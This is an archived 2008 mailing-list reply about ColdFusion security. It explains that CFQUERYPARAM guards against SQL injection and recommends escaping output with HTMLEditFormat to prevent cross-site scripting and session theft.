if your using CFQUERYPARAM there's nothing to worry about database side, the danger is when you output the varchar string to your website without sanitising the string. If that string includes some javascript for example, they could steal your client's session.
using HTMLEditFormat when displaying such string content makes it safe, as <script> becomes <script> z On Mon, Jun 30, 2008 at 2:15 PM, nedlud <[EMAIL PROTECTED]> wrote: > > Hi, > > I'm a bit concerned about Coldfusions security vrs SQL injection > attacks. As a rule I use CFQUERYPARAM s for all parameters going into > a query (I use MySql as my db, if that makes any difference). > > But it seems to me that the cf_sql_varchar type is still a liability > since you can effectively pass any string into taht field. So what's > to stop people from trying an injection there? Setting the length on > the string, as the live docs suggest, seems a particularly lame > defence. > > Any comments or suggestions for how I should deal with this? > > I've done some googling and keep coming up empty with solutions > applicable to CF. > > Am I really going to have to check all string parameters myself before > passing them into the db? > > > -- Zac Spitzer - http://zacster.blogspot.com (My Blog) +61 405 847 168 --~--~---------~--~----~------------~-------~--~----~ You received this message because you are subscribed to the Google Groups "cfaussie" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [EMAIL PROTECTED] For more options, visit this group at http://groups.google.com/group/cfaussie?hl=en -~----------~----~----~----~------~----~------~--~---
